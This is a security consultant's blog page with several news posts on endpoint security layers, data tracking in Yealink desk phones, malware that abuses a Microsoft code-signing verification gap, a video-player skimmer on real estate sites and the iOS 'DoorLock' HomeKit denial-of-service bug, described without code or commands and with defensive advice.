All posts by mitch tanenbaum

The Layers of Effective Endpoint Security

As hackers become smarter, generate more and more effective attacks and users continue to work from almost anywhere, IT teams have to get smarter about effective endpoint security. This is going to take a layered approach. This includes moving towards zero-trust. Here are some recommendations.

  1. Signature and heuristic-based detection – this is what most traditional endpoint protection solutions have used for years (AKA anti-virus and anti-malware). This is, historically, where endpoint protection stopped. Now it is where it starts.
  2. Contextual detection – this is where machine learning comes in. Even with unknown malware, ransomware and other bad stuff, looking at the context of what is being done can allow you to detect activity which is out of the ordinary.
  3. Anti-exploit technology – this is where you do continuous monitoring to block zero-days, fileless malware and more. This requires technology that can track all actions taken by all processes to look for anomolies.
  4. Add the cloud to the mix – Now that you have all of this data, across all of the endpoints of the enterprise, including the end users, servers, the corporate cloud and the public cloud, what do you do with that data. You need a set of tools that can analyze that data in real time, mix in threat intelligence from other sources and likely, even, throw in a pinch of human analysis and then feed that back into each endpoint so that it can adjust it’s protection techniques. (note that the referenced article at the end says that only one vendor does this. That is actually not true. I am sure that only one vendor does it in the very particular way they do it, but that doesn’t mean that many other vendors don’t do the same thing in their own way).
  5. Threat hunting service – this is where the humans come in and it takes specialized expertise. People who look at this data coming from the endpoints and making sense of it. It is certainly possible that you are the only company on the planet that is being hacked in a particular way – but I seriously doubt it. Even if that were true, the techniques used by hackers are often reused, allowing an experienced threat hunter to detect those patterns.

Doing this is not simple and, unfortunately, not cheap. We have reviewed a lot of tools and have found the best and the brightest. And the most cost effective. You can also do this incrementally, because you are going to have to integrate IT business processes to make this effective.

However, if you don’t start, you will never get there.

The hackers are not going to wait for you. Unfortunately.

Credit: CSO Online

The Latest Supply Chain Risk – Your Desk Phone

Senator Chris Van Hollen (Maryland) wrote a letter to Commerce Secretary Raimondo asking what she planned to do about this security vulnerability – the first we are hearing about it. Raimondo could ban the equipment, just like equipment made by Huawai and others.

Chinese electronics maker Yealink is not a household word like Huawei, but it may soon be.

Yealink’s phones are, apparently, popular in the United States, including at government agencies – federal, state and local, but they might have just a few security concerns.

Van Hollen’s letter references a report by Virginia-based Chain Security that scopes out hardware risk for a living.

The report says that Yealink’s Device Management Platform or DMP is what allows users to make calls and administrators to manage the phones.

HOWEVER, it also allows Yealink to secretly record those calls and also, for computer based phones, to track which websites users are visiting.

Concerned yet?

It turns out that even if you are using a physical phone, if the computer gets to the network through the phone, the phone can still track what websites you are visiting. Actually not CAN track you; rather it should be IS tracking you.

While it is unknown, it is suspected that Yealink is a Sysadmin for the DMP, hence has to power to do anything that any other admin can do.

Yealink’s service agreement requires users (like US Government employees with one of their phones on his or her desk) to accept China’s laws, including a term that allows for the active monitoring of users when required by the ‘national interest’ of China.

The phone also does not digitally sign software updates, so if someone can convince the phone to accept an update, it has no way of knowing whether that update is legitimate or not.

Even scarier is Verizon’s response to this revelation: A Verizon spokesperson said Yealink’s DMP “has been built to meet the custom requirements of Verizon” and that the customization was related to “security; feature management exposure to the devices through the DMP; firmware management and remote diagnostics.”

Does that mean that Verizon is in cahoots with China?

If all of this wasn’t bad enough, the phone sends encrypted messages to China three times a day.

The Commerce Department responded to the Senator saying that they take this stuff seriously.

Whatever the hell that means.

My guess is that this is probably not a lot different than other tech that may be in your office or home – which means that you might want to be more aggressive in reviewing the security of those tech toys.

Credit: Defense One

Security News for the Week Ending January 7, 2022

Software released by Microsoft and other vendors is digitally signed so that users can validate that it really came from the vendor in question and that it has not been modified since the vendor created it.

However, hackers have figured out how to bypass the security provided by Microsoft’s digital signature verification process, allowing them to add malware while leaving the signature intact.

According to security firm Check Point, here is how the malware that they have detected works. The problem is, however, much bigger than this. Now that the technique is public, this could be used to modify any already signed software leaving the signature intact.

This particular attack begins by installing Atera software on a victim’s machine. Atera is a legitimate remote maintenance product (like Kasaya, which was compromised last year) used by Managed Service Providers (MSPs). In this case, the victim did not know that they were installing Atera; they thought they were installing a Java update.

Check Point is still trying to figure out exactly how the Atera software was deployed in this case, but in earlier cases, the hacker played a short click of adult content and then told the victim that they needed to install this Java update, which was really malware.

Once the Atera software is on the victim’s computer, the hacker tells Atera to download and run two batch files. One changes Window’s Defender’s preferences to not check certain folders and filetypes and the other installs the malware.

Next the attacker runs MSHTA with a particular DLL as the parameter. The catch is that the DLL had malicious scripts added to it. Due to an oversight by Microsoft, adding the script does not invalidate the signature.

Microsoft FIXED this bug in 2013 – that’s right, 9 years ago, but they changed it in 2014 after discovering that it broke some customer software. Microsoft, in its always effort to be customer friendly, decided to totally compromise their customers’ security rather than telling their customers to re-sign their software.

Now that decision is coming back to bite them in the ….. (fill in the blank).

It looks like the way their disabled it was to change the install of the fix (for CVE-2020-1599, CVE-2013-3900 and CVE-2012-0151) from mandatory to optional. As a result most users do not have it installed.

The fix is to install the update, understanding that it is possible that it might break some stuff: Microsoft Security Advisory 2915720 | Microsoft Docs .

Credit: MSN and Dark reading

New Attack Exploits Microsoft Software Signing Verification

Software released by Microsoft and other vendors is digitally signed so that users can validate that it really came from the vendor in question and that it has not been modified since the vendor created it.

However, hackers have figured out how to bypass the security provided by Microsoft’s digital signature verification process, allowing them to add malware while leaving the signature intact.

According to security firm Check Point, here is how the malware that they have detected works. The problem is, however, much bigger than this. Now that the technique is public, this could be used to modify any already signed software leaving the signature intact.

This particular attack begins by installing Atera software on a victim’s machine. Atera is a legitimate remote maintenance product (like Kasaya, which was compromised last year) used by Managed Service Providers (MSPs). In this case, the victim did not know that they were installing Atera; they thought they were installing a Java update.

Check Point is still trying to figure out exactly how the Atera software was deployed in this case, but in earlier cases, the hacker played a short click of adult content and then told the victim that they needed to install this Java update, which was really malware.

Once the Atera software is on the victim’s computer, the hacker tells Atera to download and run two batch files. One changes Window’s Defender’s preferences to not check certain folders and filetypes and the other installs the malware.

Next the attacker runs MSHTA with a particular DLL as the parameter. The catch is that the DLL had malicious scripts added to it. Due to an oversight by Microsoft, adding the script does not invalidate the signature.

Microsoft FIXED this bug in 2013 – that’s right, 9 years ago, but they changed it in 2014 after discovering that it broke some customer software. Microsoft, in its always effort to be customer friendly, decided to totally compromise their customers’ security rather than telling their customers to re-sign their software.

Now that decision is coming back to bite them in the ….. (fill in the blank).

It looks like the way their disabled it was to change the install of the fix (for CVE-2020-1599, CVE-2013-3900 and CVE-2012-0151) from mandatory to optional. As a result most users do not have it installed.

The fix is to install the update, understanding that it is possible that it might break some stuff: Microsoft Security Advisory 2915720 | Microsoft Docs .

Credit: MSN and Dark reading

Supply Chain Attacks Are Rampant

Today’s supply chain attack is interesting. I guess I can say that because it didn’t happen to a web site that I own and my information didn’t get stolen.

Here is the situation. Many web sites have embedded videos on them. In this case, most of the sites affected were real estate web sites and they often have virtual tour videos on the web page. In order to play a video, you need a video player. There are many video players that you can choose from, but what almost no one does is write their own video player.

Palo Alto Networks found over a hundred web sites, many or most of them (depending on which story you read) belong to the real estate firm Sotheby’s.

What happened? Some how a malicious version of the video player got loaded onto these web sites. When a visitor went to the site, the video player code was downloaded to the visitor’s computer. In this case, the malware was a data skimmer which steals information that the user provides to the website. It could be name and address information or it could be credit card information. The information can be used for social engineering or financial crimes.

The malware is polymorphic, meaning that no two copies of the malware are the same, making it difficult to detect and block. The code is also obfuscated, which makes it difficult to read and understand, so even if tried to figure out if it was malicious, it is unlikely that you could figure that out.

Now that this particular attack has become public, hackers all over the world are going to copy it. All it takes is a web site hosting the code with lax security. The hacker can then compromise the code and wait for a developer to use it.

This is not at all limited to video players, even though there are thousands of them. Any bit of shared code that is hosted in the cloud and linked to by developers is a valid target.

This means that you need to have a robust software supply chain risk management program in place, unless you want to be like these firms and dealing with a shattered reputation.

If you need help with this, please contact us.

Credit Threatpost and Bleeping Computer

Apple iOS in the Doghouse Again

iOS devices running 14.7 through 15.2 – basically all devices – are subject to a denial of service attack that forces the user to do a factory reset, wiping all of the user’s data.

If the user logs in to iCloud to restore the data, the denial of service attack will replay once the data is restored, resulting in a “rinse and repeat” cycle.

Apple was told about the bug last August but has not mitigated it. As a result, the researcher who discovered it has publicly disclosed it and created a proof of concept app to demonstrate it.

Apple has repeatedly said that they would fix it, but have not.

The bug is related to the Homekit software, which does home automation and, apparently, it does not matter whether you are doing any home automation or not. If the hacker manages to create a device name of more than 500,000 characters, which can be done in a number of ways, the iDevice goes into cardiac arrest.

For more technical details on how the attack works, read the article at the link.

Since all good attacks need a catchy name, this one is called DoorLock.

Apple did quietly create a partial mitigation in 15.1, if you know about it and use it. The attack creates a device name of more than 500,000 characters, causing the iDevice to go belly-up. There is a way to limit the device name length, but it is not set by default (why?). My guess is that maybe a half dozen Apple employees have set this to protect themselves.

One bright spot is that the hacker would either need to have access to your “home” or get you to manually accept an invitation to one. The second seems easier than the first, using a pretty vanilla social engineering scam.

If you don’t have your data backed up, you are, as they say, in a world of trouble.

There is a way, if you know what is going on, to mitigate the “rinse and repeat” loop to restore your data from iCloud, so all is not lost, but it could be very stressful.

You are now warned Credit: Bleeping Computer